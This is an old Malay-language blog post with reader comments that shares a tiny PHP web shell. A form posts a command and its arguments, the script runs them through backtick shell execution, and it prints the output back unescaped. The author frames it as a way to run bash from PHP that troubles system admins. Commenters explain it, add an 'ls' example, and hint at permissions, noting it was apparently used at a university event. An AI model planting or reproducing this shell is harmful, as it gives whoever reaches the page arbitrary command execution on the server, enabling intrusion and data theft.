2007
06.23
06.23
Salam semua..
php dan bash. Jika mereka bekerja sama, mampu memeningkan kepala sistem admin.
skrip php di bawah memudahkan anda untuk melarikan bash dari php.
berhati2 menggunakannya.
————————————
<?php
$parameter = $_POST['parameter'];
$arahan= $_POST['arahan'];
echo `$arahan $parameter`;?>
<form method=’post’ action= >
task:<input type=text name=arahan value=’<?php echo $arahan ?>’ >
<br>
param2:<input type=text name=parameter size=200 value=’<?php echo $parameter ?>’ ><input type=submit value=’berani?’>
</form>
——————————————-
err .. i couldnt see anything bash in the code ..
tu bukan just print balik apa yg orang submit ke ..
KageSenshi, take a good look at this part.
echo `$arahan $parameter`;
There’s something the author trying to say here, almost indirectly
kekadang mata terlepas pandang,
cuba serahkan kepada apache/php server utk menelitinya
.
try cut n paste, then you’ll see the result.
tambah bagi senang baca hasilnya nanti:
…
hmm, try contoh yang senang ni je;
<?php
echo `ls -lh`;
?>
HINT: permission, user
mcm pnah nampak code ni? kat uitm aritu kot..
hmmmm..
congrates 3b055.org
hehe… tapi tak leh guna pun… judge dah blok shell_execute awal2 lagi